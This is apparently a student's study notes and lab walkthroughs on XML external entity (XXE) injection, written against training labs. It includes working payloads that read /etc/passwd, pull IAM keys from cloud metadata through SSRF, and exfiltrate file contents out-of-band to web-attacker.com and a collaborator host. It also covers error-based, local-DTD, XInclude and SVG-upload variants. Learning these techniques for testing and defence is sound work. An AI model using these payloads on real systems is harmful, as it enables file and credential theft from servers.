[Toc] # What is XML enternal entity injection? XML external enity injection (also known as XXE) allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and interact with any back-end or external systems that the application itself can access # What are the types of XXE attacks? There are various types of XXE attacks: - **XXE to retrieve files**, where an external entity is defined containing the contents of a file, and returned in the application's response - **XXE to perform SSRF attacks** where an external entity is defined based on a URL to a back-end system - **Blind XXR exfiltrate data out-of-band**, where sensitive data is transmitted from the application server to a system that the attacker controls - **Blind XXE to retrieve data via error messages**, where the attacker can trigger a parsing error message containing sensitive data # Expoloiting XXE to retrieve files To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways: - Introduce (or edit) a `DOCTYPE` element that defines an external entity containing the path of the file - Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server: ```xml= <?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck> ``` The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the `/etc/passwd` file by submitting the following XXE payload: ```xml= <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck> ``` This XXE payload defines an external entity `&xxe;` whose value is the contents of the `/etc/passwd` file and uses the intity within the `productId` value. This causes the application's response to include the contents of the file: ``` Invalid product ID: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... ``` ### APPRENTICE Lab: Exploiting XXE using external entities to retrieve files Function `Check stock` send a XML to server ![image](https://hackmd.io/_uploads/Bk25_bc5T.png) Send request to Repeater and add this payload: ``` <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> ``` ![image](https://hackmd.io/_uploads/HJyQCZcqa.png) ![image](https://hackmd.io/_uploads/rJKB0-qqp.png) :::success **Solve** :+1: ::: # Exploiting XXE to perform SSRF attacks Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform SSRF. This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access. To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response. In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure: ``` <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]> ``` ### APPRENTICE Lab: Exploiting XXE to perform SSRF attacks This lab has a "Check stock" feature that parses XML input. ![image](https://hackmd.io/_uploads/ryCSmz5qa.png) The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is `http://169.254.169.254/`. This endpoint can be used to retrieve data about the instance, some of which might be sensitive. ![image](https://hackmd.io/_uploads/HJOkBz95T.png) Seem like it's vulnerable to SSRF. To solve the lab, obtain the server's IAM secret access key from the EC2 metadat endpoint In this step, I really not sure how this EC2 work, but I keep query to what is return like this: ![image](https://hackmd.io/_uploads/BkILLGcc6.png) Continue with `meta-data`: ![image](https://hackmd.io/_uploads/SyucIz5cp.png) Keep going like that and we reach the sensitive data: ![image](https://hackmd.io/_uploads/ry_RLGc9T.png) ![image](https://hackmd.io/_uploads/SJWePz9ca.png) :::success **Solve** :+1: ::: # Blind XXE ## Detecting blind XXE using OAST techniques You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would define an external entity as follows ``` <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]> ``` You would then make use of the defined entity in a data value within the XML This XXE attack causes the server to make a back-end HTTP request to the specified URL. The attacker can monitor for the resulting DNS lookup and HTTP request, and thereby detect that the XXE attack was successful ### PRACTITIONER: Blind XXE with out-of-band interaction This lab has a "Check stock" feature that parses XML input but does not display the result. ![image](https://hackmd.io/_uploads/Bkb_hf5qT.png) But by triggering out-of-band interactions ưith an external domain we can make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator ![image](https://hackmd.io/_uploads/ByJke7ccp.png) ![image](https://hackmd.io/_uploads/HJxzGQc5a.png) :::success **Solve** :+1: ::: ### PRACTITIONER Lab: Blind XXE with out-of-band interaction via XML parameter entities Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name: ```xml= <!ENTITY % myparameterentity "my parameter entity value" > ``` And second, parameter entities are referenced using the percent character instead of a usual ampersand: ``` %myparameterentity; ``` This means that you can test for blind XXE using out-of-band detection vua XML paremeter entities as follows: ```xml= <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]> ``` This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful This lab has a "Check stock" feature that parses XML input. ![image](https://hackmd.io/_uploads/S1sSQ4ssa.png) But it does not display any unexpected values, and blocks requests containing reglar external entities Try using XML parameter entity: ![image](https://hackmd.io/_uploads/SkqVIEis6.png) This causes a DNS lookup and HTTP request to our domain ![image](https://hackmd.io/_uploads/Hkv_8Esia.png) ![image](https://hackmd.io/_uploads/SJIG_Nsi6.png) :::success **Solve** :+1: ::: ## Exploiting blind XXE to exfiltrate data out-of-band Detecting a blind XXE vulnerability via out-of-band techniques is all very well, but it doesn't actually demonstrate how the vulnerability could be exploited. What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, adn then involking the external DTD from within the in-band XXE payload. **What is a DTD** A DTD is a Document Type Definition, difines the struture and the legal elemets and attributes of an XML document **Why USE a DTD** With a DTD, independent groups of people can agree on a standard DTD for interchanging data. An application can use a DTD to verify that XML data is valid **An Internal DTD Declaration** If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE> defination: **XML Document with an internal DTD** ```xml= <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend</body> </note> ``` The DTD above is interpreted like this: - !DOCTYPE note defines that the root element of this docuent is note - !ELEMENT note defines that the note element must contain four elements: "to, from, heading, body" - !ELEMENT to defines the to element to be of type "#PCDATA" and same with !ELEMENT from, heading, body And this is how the XML file looklike: ![image](https://hackmd.io/_uploads/B1-I9-osT.png) **An example of a malicious DTD to exfiltrate the contents of the `/etc/passwd` file as follows:** ```xml=! <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>"> %eval; %exfiltrate; ``` This DTD carries out the following steps: - Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file - Defines an XML parameter enity called `eval`, containing a dynamic declaration of another XML parameter entity called `exfiltrate`. The `exfiltrate` entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the `file` entity within the URL query string - Uses the `eval` entity, which causes the dynamic declaration of the `exfiltrate` entity to. be performed - Uses the `exfiltrate` entity, so that its value is evaluated by requesting the specified URL The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL: ``` http://web-attacker.com/malicious.dtd ``` Finally, the attacker must submit the following XXE payload to the vulnerable application: ``` <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]> ``` This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server. ### PRACTITIONER Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD This lab has a "Check stock" feature that parses XML input but does not display the result. So we can check blind XXE using this request: ![image](https://hackmd.io/_uploads/Sk6-fSoia.png) Check collaborator tab for result: ![image](https://hackmd.io/_uploads/S1c7MHiiT.png) Now place the Burp Collaborator payload into a malicious DTD file: ```xml= <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://e3i7wzpk768tf6x8riqwd56cs3yumpae.oastify.com/?x=%file;'>"> %eval; %exfil; ``` Click "Go to exploit server" and save the malicious DTD file on your server. ![image](https://hackmd.io/_uploads/rk6wmrsia.png) Click "View exploit" and take a note of the URL ![image](https://hackmd.io/_uploads/S1BtmSisp.png) To exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. Insert the following external deinition in between the XML declaration and the `stockCheck` element: ``` <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> ``` ![image](https://hackmd.io/_uploads/Hyoi4Sso6.png) Go back to the Collaborator tab, and click "Poll now" to see the interactions ![image](https://hackmd.io/_uploads/SyMZHSisa.png) You should see some DNS and HTTP interactions that were intiated by the application as the result of your payload. The HTTP interaction could contain the contents of the `/etc/hostname` file ![image](https://hackmd.io/_uploads/rJxjrrsia.png) Submit answer ![image](https://hackmd.io/_uploads/Sk2pBHjja.png) :::success **Solve** :+1: ::: ## Exploiting blind XXE to retrieve data via error messages An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve. This will be effective if the application returns the resulting error message within its response. You can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using a malicious external DTD as follows: ``` <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` This DTD carries out the following steps: - Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file. - Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `error`. The `error` entity will be evaluated by loading a nonexistent file whose name contains the value of the `file` entity. - Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed, - Uses the `error` entity, sos that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file ### PRACTITIONER Lab: Exploiting blind XXE to retrieve data via error messages This lab has "Check stock" feature that parses XML input but does not display the result. So we can check blind XXE using this request: ![image](https://hackmd.io/_uploads/BJr5rq-2a.png) Then we can see some interation in Collaborator tab: ![image](https://hackmd.io/_uploads/SJQJ85Z3a.png) We can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using this malicious DTD: ``` <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` Click "Go to exploit server" and save the malicious DTD file on your server. Click "View exploit" and take a note of the URL. ![image](https://hackmd.io/_uploads/ryhWt5-na.png) Invoking the malicious external DTD will result in an error message: ![image](https://hackmd.io/_uploads/ryeOF5W3T.png) ![image](https://hackmd.io/_uploads/SJW5F9W2T.png) :::success **Solve** :+1: ::: ## Exploiting blind XXE by repurposing a local DTD The preceding technique works fine with an external DTD, but it won't normally work with an internal DTD that is fully specified within the `DOCTYPE` element. This is because the technique involves using an XML parameter entity within the definition of another parameter entity. Per the XML specification, this is permitted in external DTDs but not in internal DTDs. So what about blind XXE vulnerabilities when out-of-band interactions are blocked? You can't exfiltrate data via an out-of-band connection, and you can't load an external DTD from a remote server. In this situation, it might still be possible to trigger error messages containing sensitive data, due to a loophole in the XML language specification. If a document's DTD uses a hybrid of internal and external DTD declarations, then the **internal DTD can redefine entities that are declared in the external DTD**. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed. This means that an attacker can employ the error-based XXE technique from within an internal DTD, provided the XML parameter entity that they use is redefining an entity that is declared within an external DTD. Of course, if out-of-band connections are blocked, then the external DTD cannot beloaded from a remote location. Instead, it needs to be an external DTD file that is local to the application server. Essentially, the attack involves **invoking a DTD file that happens to exist on the local filesystem** and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data. For example, suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. An attacker can trigger an XML parsing error message containing the contents of the `/etc/passwd` file by submitting a hybrid DTD like the following: ```xml= <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ] > ``` This DTD caries out the following steps: - Defines an XML parameter entity called `local_dtd`, containing the contents of the external DTD file that exists on the server filesystem - Redefines the XML parameter called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the error-based XXE exploit that was already described, for triggering an error message containing the contents of the `etc/passwd` file - Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message. ### Locating an existing DTD file to repurpose Since this XXE attack involves repurposing an existing DTD on the server filesystem, a key requirement is to locate a suitable file. This is actually quite straightforward. Because the application returns any error messages thrown by the XML parser, you can easily enumerate local DTD files just by attempting to load them from within the internal DTD. For example, Linux systems using the GNOME desktop environment often have a DTD file at `/usr/share/yelp/dtd/docbookx.dtd`. You can test whether this file is present by submitting the following XXE payload, which will **cause an error if the file is missing**: ```xml <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]> ``` After you have tested a list of common DTD files to locate a file that is present, you then need to obtain a copy of the file and review it to find an entity that you can redefine. Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search ### EXPERT Lab: Exploiting XXE to retrieve data by repurposing a local DTD This lab as a "Check stock" feature that parses XML input but does not display the result. 1. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite ![image](https://hackmd.io/_uploads/SyiJkO23T.png) 2. Insert the following parameter entity definition in between the XML declaration and the `stockCheck` element: ``` <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]> ``` This will import the Yelp DTD, then redefine the ISOamso entity, triggering an error message contain the contents of the `/etc/passwd` file Result: ![image](https://hackmd.io/_uploads/B1sngdn3T.png) :::success **Solve** :+1: ::: # Finding hidden attack surface for XXE injection Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML ## XInclude attacks Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed ubti a back-end SOAP request, which is then processed by the backedn SOAP service. In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead. `XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. To perform an `XInclude`, you need to reference the `XInclude` namespace and provide the path to the file that you wish to include. For example: ``` <foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/></foo> ``` ### PRACTITIONER Lab: Exploiting XInclude to retrieve files After walking around the website, I can see it's not carry out any XML document. Even function `Checkstock` ![image](https://hackmd.io/_uploads/rJuZ_OT3p.png) But I want to use `Content Type Converter` extension in Burp to check if server can process JSON ![image](https://hackmd.io/_uploads/BJxi_Op26.png) And it not excepted JSON ![image](https://hackmd.io/_uploads/HkrHtuT2p.png) :::warning If the API accepts JSON or other content, change it to XML. If the expected response is returned, it's parsing XML, so XXE time! ::: So after testing that we can also try something like this `&entity` ![image](https://hackmd.io/_uploads/SklPj_T3p.png) This error is showing that the application is actually parsing this as XML. It's parsing whatever we input as xml. Now we know that it's parsing XML let's try XInclude ![image](https://hackmd.io/_uploads/B1o_2d626.png) And bingo, we solved the lab ![image](https://hackmd.io/_uploads/Hync2uTha.png) :::success **Solve** :+1: ::: ## XXE attacks via file upload Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG. For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden atttack surface for XXE vulnerabilities. ### PRACTITIONER Lab: Exploiting XXE via image file upload This website has a function to upload image. And we can upload a svg file like this. ![image](https://hackmd.io/_uploads/rkBFroT26.png) Since SVG format uses XML, we can change the content of the SVG file like this ```xml= <?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <text font-size="16" x="0" y="16"> &xxe; </text> </svg> ``` Remeber to not has any black space at the very first line of the file, or you will get an error like this ![image](https://hackmd.io/_uploads/BJK0q2636.png) You can see there is a blank space at line 39. Delete this line and you can upload the file ![image](https://hackmd.io/_uploads/SJP-i3ahT.png) Next reload the website and access the file you just uploaded ![image](https://hackmd.io/_uploads/rJ7Nj3a3p.png) You can see that the svg file was processed by the server and generate to a new png file. This file is contain the content we ask in the payload xml, which is the host name. Submit answer and solve the lab ![image](https://hackmd.io/_uploads/r1-ao2ThT.png) :::success **Solve** :+1: :::